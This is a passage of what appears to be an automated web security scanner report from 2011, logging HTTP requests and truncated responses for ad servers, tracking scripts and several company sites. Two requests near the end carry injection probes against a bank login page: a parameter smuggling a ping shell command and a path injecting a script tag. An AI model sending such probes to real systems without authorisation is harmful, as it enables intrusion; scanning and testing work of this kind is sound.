User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 835
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 11:34:20 GMT
Expires: Tue, 26 Apr 2011 11:34:20 GMT
Discarded: true

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/1eb/%2a/k;228460640;1-0;0;50161665;3454-728/90;39961083/39978870/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1u
...[SNIP]...

30.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2423626&PluID=0&w=300&h=250&ord=20110426142246&ifrm=2&ncu=http%3A%2F%2Fspamlaws.us.intellitxt.com%2Fal.asp%3Fts%3D20110426142113%26at%3D39%26ipid%3D10143%26di%3D31742909%26syid%3D0%26adid%3D0%26pid%3D2%26cc%3Dus%26rcc%3Dus%26mh%3Db5e073b8ec12fc1181fc2fd3b1a46a79%26ll%3D0%26hbll%3D0%26id%3DFCBEC610ABA64BC3BAF092D3EB42D7C0%26idh%3De18a41658ec9c9c740dc1b91edbc4646%26pvu%3D59196390591647FA9372FACB8C10DBA5%26pvm%3D35e167e1c66fee62be98fe397190a726%26uf%3D0%26ur%3D0%26llip%3D0%26ttv%3D1%26redir%3D HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000gY2paFS+09nl00003hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWg07aw00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui9eB50000000001uj8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001jcM0aFSa04m400000eDVwaDPh084o00001gY2paFS+09nl00003hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002johvaFxN07uh00002hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWf07aw00001j2VdaGye07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001iBU1aEBz0aVU000019rW0aFGt04uw00001; expires=Mon, 25-Jul-2011 10:22:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh7.Ws0000000001ui99y10000000001ui80Dr0000000003uj; expires=Mon, 25-Jul-2011 10:22:37 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 26 Apr 2011 14:22:37 GMT
Connection: close
Content-Length: 3235

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...

30.3. http://cleanallspyware.com/Spam  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cleanallspyware.com
Path:   /Spam

Request

GET /Spam HTTP/1.1
Host: cleanallspyware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 13:52:33 GMT
Server: Apache
Last-Modified: Fri, 11 Sep 2009 15:08:18 GMT
ETag: "20e0105-3b3-afa03c80"
Accept-Ranges: bytes
Content-Length: 947
Connection: close
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>Please wait a few seconds...</TITLE>
<META HTTP-EQUIV="Refresh" CONTENT="1; URL=http://www.cleanallspyware.com/">
</HEAD>
<BODY>
</BODY>
</HTML>

<!--
- Unfortunately
...[SNIP]...

30.4. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=1359940;type=merri082;cat=globa539;ord=1;num=3025314772967.249? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merrilledge.com/m/pages/global-oao.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 26 Apr 2011 12:28:21 GMT
Expires: Tue, 26 Apr 2011 12:28:21 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 839

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://pc
...[SNIP]...

30.5. http://ikano.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ikano.com
Path:   /

Request

GET / HTTP/1.1
Host: ikano.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:17:42 GMT
Server: Microsoft-IIS/6.0
Content-Length: 40886
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAABCTBBA=OLEKIPADNLNANJACJFBNPLPF; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IKANO.com - Inter
...[SNIP]...

30.6. http://ikano.com/contact.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ikano.com
Path:   /contact.asp

Request

GET /contact.asp HTTP/1.1
Host: ikano.com
Proxy-Connection: keep-alive
Referer: http://ikano.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAABCTBBA=NLEKIPADFPBEDKBDIAMCABGF; __utmz=18335905.1303823875.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18335905.1341540347.1303823875.1303823875.1303823875.1; __utmc=18335905; __utmb=18335905.6.10.1303823875

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:37 GMT
Server: Microsoft-IIS/6.0
Content-Length: 43732
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>IKANO.com
...[SNIP]...

30.7. http://ikano.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ikano.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: ikano.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAABCTBBA=NLEKIPADFPBEDKBDIAMCABGF; __utmz=18335905.1303823875.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18335905.1341540347.1303823875.1303823875.1303823875.1; __utmc=18335905; __utmb=18335905.2.10.1303823875

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:00 GMT
Server: Microsoft-IIS/6.0
Content-Length: 39645
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>IKANO.com -
...[SNIP]...

30.8. http://ikano.com/press/dslextremepress.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ikano.com
Path:   /press/dslextremepress.asp

Request

GET /press/dslextremepress.asp HTTP/1.1
Host: ikano.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAABCTBBA=NLEKIPADFPBEDKBDIAMCABGF; __utmz=18335905.1303823875.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18335905.1341540347.1303823875.1303823875.1303823875.1; __utmc=18335905; __utmb=18335905.5.10.1303823875

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:22 GMT
Server: Microsoft-IIS/6.0
Content-Length: 31115
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>IKANO.com
...[SNIP]...

30.9. http://ikano.com/press/dslextremepress2.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ikano.com
Path:   /press/dslextremepress2.asp

Request

GET /press/dslextremepress2.asp HTTP/1.1
Host: ikano.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAABCTBBA=NLEKIPADFPBEDKBDIAMCABGF; __utmz=18335905.1303823875.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18335905.1341540347.1303823875.1303823875.1303823875.1; __utmc=18335905; __utmb=18335905.2.10.1303823875

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:19 GMT
Server: Microsoft-IIS/6.0
Content-Length: 32112
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>IKANO.com
...[SNIP]...

30.10. http://ikano.com/press/referralagent.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ikano.com
Path:   /press/referralagent.asp

Request

GET /press/referralagent.asp HTTP/1.1
Host: ikano.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAABCTBBA=NLEKIPADFPBEDKBDIAMCABGF; __utmz=18335905.1303823875.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18335905.1341540347.1303823875.1303823875.1303823875.1; __utmc=18335905; __utmb=18335905.2.10.1303823875

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:17 GMT
Server: Microsoft-IIS/6.0
Content-Length: 32056
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>IKANO.com
...[SNIP]...

30.11. http://ikano.com/press/serverhuggerpress.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ikano.com
Path:   /press/serverhuggerpress.asp

Request

GET /press/serverhuggerpress.asp HTTP/1.1
Host: ikano.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAABCTBBA=NLEKIPADFPBEDKBDIAMCABGF; __utmz=18335905.1303823875.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18335905.1341540347.1303823875.1303823875.1303823875.1; __utmc=18335905; __utmb=18335905.2.10.1303823875

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:19 GMT
Server: Microsoft-IIS/6.0
Content-Length: 31637
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>IKANO.com
...[SNIP]...

30.12. https://landingpage.leads.dynamicssite.com/PostLead.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://landingpage.leads.dynamicssite.com
Path:   /PostLead.aspx

Request

GET /PostLead.aspx HTTP/1.1
Host: landingpage.leads.dynamicssite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 410 Gone
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sbosSession=473982fb-74e6-4678-9919-c52e596ea5bc; path=/; HttpOnly
Set-Cookie: ClientSettings=ClientLocaleList=en~en-US&WebSource=UNKNOWN&WebDestination=UNKNOWN&WebDestinationVersion=DEFAULT; path=/; HttpOnly
Set-Cookie: Version=1.0.0.0; path=/; HttpOnly
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Tue, 26 Apr 2011 12:40:24 GMT
Connection: close

The page you requested was removed.

30.13. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1843&ref2=elqNone&tzo=360&ms=640 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.firstdata.com/en_us/home
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=8EE1D10DCCE142B68BB195EB59D8F5BA; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 23:46:27 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

30.14. http://pixel.intellitxt.com/pixel.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.intellitxt.com
Path:   /pixel.jsp

Request

GET /pixel.jsp?id=2773,2759,2761,2791&type=script&ipid=10143&sfid=0 HTTP/1.1
Host: pixel.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://spamlaws.us.intellitxt.com/iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2759%2C2761%2C2791%26type%3Dscript%26ipid%3D10143%26sfid%3D0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eoAAACucBAAAAAQAAAS+SL16gAAAK1QEAAAABAAABL5IvXqAAAArHAQAAAAEAAAEvki9eoAAAAACIhXZ+; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:08 GMT; Path=/
Content-Type: text/html
Content-Length: 1602
Date: Tue, 26 Apr 2011 14:21:08 GMT
Connection: close

(function(){try{var d=document;var u;u='http://segment-pixel.invitemedia.com/pixel?code=2773&partnerID=86&key=segment&returnType=js';if(navigator.appVersion.indexOf('MSIE')>=0 && ('complete'!=document
...[SNIP]...

30.15. https://secure.comodo.com/management/passwordResetRequest.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.comodo.com
Path:   /management/passwordResetRequest.html

Request

GET /management/passwordResetRequest.html HTTP/1.1
Host: secure.comodo.com
Connection: keep-alive
Referer: https://www.comodo.com/login/comodo-members.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wooTracker=ZQXK7Q954RCS6ZFI1HH4JS1QZ5D1UD01

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:52:49 GMT
Content-Type: text/html
Last-Modified: Fri, 15 Dec 2006 13:25:17 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 2966

<html>
<head>
<title>Password Reset: Request</title>
<link rel="stylesheet" href="/css/css.css">
<script language="JavaScript" type="text/javascript">
<!--
function loginName_changed(

...[SNIP]...

30.16. http://spamlaws.us.intellitxt.com/iframescript.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spamlaws.us.intellitxt.com
Path:   /iframescript.jsp

Request

GET /iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2759%2C2761%2C2791%26type%3Dscript%26ipid%3D10143%26sfid%3D0 HTTP/1.1
Host: spamlaws.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: text/html
Content-Length: 162
Date: Tue, 26 Apr 2011 14:21:07 GMT
Age: 0
Connection: keep-alive

<html><body><script src="http://pixel.intellitxt.com/pixel.jsp?id=2773,2759,2761,2791&type=script&ipid=10143&sfid=0" language="javascript"></script></body></html>

30.17. http://www.backbonesecurity.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.backbonesecurity.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.backbonesecurity.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40337213; CFTOKEN=80631860

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 23:44:04 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

30.18. http://www.directbrand.com/tracking202/static/landing.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directbrand.com
Path:   /tracking202/static/landing.php

Request

GET /tracking202/static/landing.php?lpip=92317 HTTP/1.1
Host: www.directbrand.com
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:52:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 3158
Connection: close
Content-Type: text/html

function t202Init(){
   //this grabs the t202kw, but if they set a forced kw, this will be replaced
   
   if (readCookie('t202forcedkw')) {
       var t202kw = readCookie('t202forcedkw');
   } else {
       var t202k
...[SNIP]...

30.19. http://www.directbrand.com/tracking202/static/record.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directbrand.com
Path:   /tracking202/static/record.php

Request

GET /tracking202/static/record.php?lpip=92317&t202id=&t202kw=&OVRAW=&OVKEY=&OVMTC=&c1=&c2=&c3=&c4=&target_passthrough=&keyword=&referer=http%3A%2F%2Fcleanallspyware.com%2FSpam&resolution=1920x1200&language=en HTTP/1.1
Host: www.directbrand.com
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:52:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Set-Cookie: tracking202subid=3562114; expires=Thu, 26-May-2011 13:52:39 GMT; path=/; domain=www.directbrand.com
Set-Cookie: tracking202subid_a_142=3562114; expires=Thu, 26-May-2011 13:52:39 GMT; path=/; domain=www.directbrand.com
Content-Length: 488
Connection: close
Content-Type: text/html


function t202initB() {

   var subid ='3562114';
   createCookie('tracking202subid',subid,0);

   var outbound = 'http://www.directbrand.com/tracking202/redirect/pci.php?pci=435621146';
   createCookie('tr
...[SNIP]...

30.20. https://www.fs.ustrust.com/login/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fs.ustrust.com
Path:   /login/login.aspx

Request

GET /login/login.aspx?sgt=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fs.ustrust.com
Cookie: Bear=TVWFHBJKf7TC1zhoN6cKOOPAr8xtme3QHkMKm7C73mI=
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS
Date: Tue, 26 Apr 2011 12:28:21 GMT
Content-type: text/html

<HEAD><TITLE>403: Access Forbidden</TITLE></HEAD>
<BODY><FONT COLOR="#CC0000"><b>Due to the presence of characters known to be used in Cross Site Scripting attacks, access is forbidden. This web site
...[SNIP]...

30.21. https://www.fs.ustrust.com/login/login.aspx'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fs.ustrust.com
Path:   /login/login.aspx'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Request

GET /login/login.aspx'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E HTTP/1.1
